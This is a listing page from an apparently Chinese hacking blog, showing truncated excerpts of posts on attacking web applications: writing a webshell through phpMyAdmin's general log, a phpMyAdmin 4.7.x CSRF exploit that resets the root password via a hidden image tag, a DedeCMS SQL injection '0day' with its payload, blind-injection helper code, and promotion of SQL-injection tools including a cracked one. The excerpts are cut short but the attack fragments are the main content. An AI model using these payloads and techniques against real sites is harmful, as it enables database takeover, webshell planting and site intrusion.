三个sql语句拿下phpmyadmin的shell

三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 --------------------------------------------------------- set global general_log='on'; --------------------------------------------------------- SET global ge...

- 阅读全文 -

phpMyAdmin 4.7.x CSRF 漏洞利用

修改root密码: 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="d...

- 阅读全文 -

BurpSuite集成Sqlmap神器!

设置很简单,这个已经是编译好的,只要在:extender-->extentions-->add 添加jar就OK了! 不过需要BurpSuite需要放到sqlmap根目录下! 本插件实现原理: 将目标请求的数据存放到临时文件中,然后调用"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如: 加入...

- 阅读全文 -

pangolin professinal edition 4.0.0.1293特别版

    Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。下载版本为15天免费的,该工具支持数据库类型都是国内外主流使用的数据库类型,包括: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, Mysql,...

- 阅读全文 -

DedeCMS会员中心分类管理SQL注射0day

漏洞描述: 需要magic_quotes_gpc = Off,所以说是鸡肋啊. 发生在数组key里的注射漏洞,有点意思. 这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 https://www.webshell.cc/member/mtypes.php?dopost=save exploit: mtypename[7' and (@`'` or (56%3D56/*sql inje...

- 阅读全文 -

学会使用这些工具,你就是合格的新手!

SQL Injection: 啊D            算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手 明小子       比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的 NBSI        这个软件对于SQL server的注入有极高的准确率 Pangolin  俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后P...

- 阅读全文 -

利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台   有SQL查询功能     在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤   第一句代码   create table cmd (a varchar(5...

- 阅读全文 -

字符型SQL注入猜解,利用iframe显示更方便

遇到一个注入点 是字符型的 测试了几个工具 貌似都不行 那就只有手工了 大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的 所以想到这个 <% for s=40 to 128 response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 c...

- 阅读全文 -